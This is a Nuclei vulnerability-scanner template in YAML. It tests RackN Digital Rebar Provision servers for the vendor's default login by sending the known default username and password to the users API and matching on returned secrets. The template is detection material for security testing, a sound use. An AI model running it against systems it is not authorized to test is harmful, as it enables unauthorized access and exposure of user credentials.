id: digitalrebar-provision-default-login

info:
  name: RackN Digital Rebar provision default login
  author: c-sh0
  reference:
     - https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
  severity: high
  tags: rackn,digitalrebar,default-login

requests:
  - raw:
      - |
        GET /api/v3/users HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    payloads:
      username:
        - rocketskates
      password:
        - r0cketsk8ts
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - 'X-Drp-'

      - type: word
        part: body
        words:
          - 'Name'
          - 'Secret'
        condition: and

